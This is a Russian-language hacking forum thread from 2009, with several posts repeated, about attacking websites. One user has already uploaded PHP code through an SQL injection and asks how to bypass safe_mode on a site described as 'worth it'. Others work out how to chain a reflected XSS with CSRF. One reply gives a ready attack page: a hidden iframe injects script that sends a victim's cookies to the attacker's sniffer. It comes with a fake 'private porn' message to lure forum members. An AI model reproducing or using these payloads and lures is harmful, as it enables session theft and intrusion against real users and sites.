есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался...
safe mod on
magic quotes on
http include disabled
как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца..
помогите +)
Последний раз редактировалось sabe; 22.01.2009 в 21:39..
Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!
Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!
технически возможно, но тебе нужно правильно составить запрос, который будет выполнятся от другого пользователя, при условии конечно если он в тот момент будет авторизован.
есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался...
safe mod on
magic quotes on
http include disabled
как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца..
помогите +)
тоесть ты свой php код можешь заливать на серв уже?
Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц:
<script>http://site.ru/bag.php?b=адрес_снифа</script>
вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!
попугай
да... долго думал.. очень)) вышло все намного проще.. вот поделюсь как я обошел сейф мод в моем случае... правда после заливки и так мало что можно зделать )
попугай
нет.. все функции отключены... токо eval пашет и ему спасибо)
могу лол токо unlink делать.. пока что остальные отключены сейфом... идеи? сайт того стоит)
Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц:
<script>http://site.ru/bag.php?b=адрес_снифа</script>
вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!
ты видимо недопонял, что такое CSRF.
CSRF это межсайтовая имитация запроса пользователя к стороннему сайту, если пользователь в это время авторизован на стороннем сайте. Т.е. если я правильно понял, то ты нашел XSS на форуме, и в связке XSS и CSRF ты можешь сделать следующее:
Допустим http://forum/bug-script.php?tipic=1 это ссылка бажного форума.
Ты нашел там XSS и ссылка с ним выглядит допустим так:
http://forum/bug-script.php?tipic=><script>alert(document.coockie)</script>
Вот. Но это палевный вариант сувать такую ссылку пользователям.
Теперь ты на своем сайте допустим hack2009.narod.ru размещаешь в index.html такой код:
<html>
<title>ERROR</title>
<body>
<b>ERROR</b>
<iframe style="width:0px; height:0px; border: 0px"
src="http://forum/bug-script.php?tipic=><script>КОД_ПЕРЕДАЧИ_ СНИФЕРУ</script>"></iframe>
</body>
</html>
и пишешь на форуме в ЛС любому пользователю, мол "смотри тут преватное порно hack2009.narod.ru". Он переходит из ЛС на твой сайт и там выполняется CSRF+XSS. Куки твои. Молодец. Пять.
p.s. может где-то ошибся просто время уже 3:05 пиши сюда помогу чем могу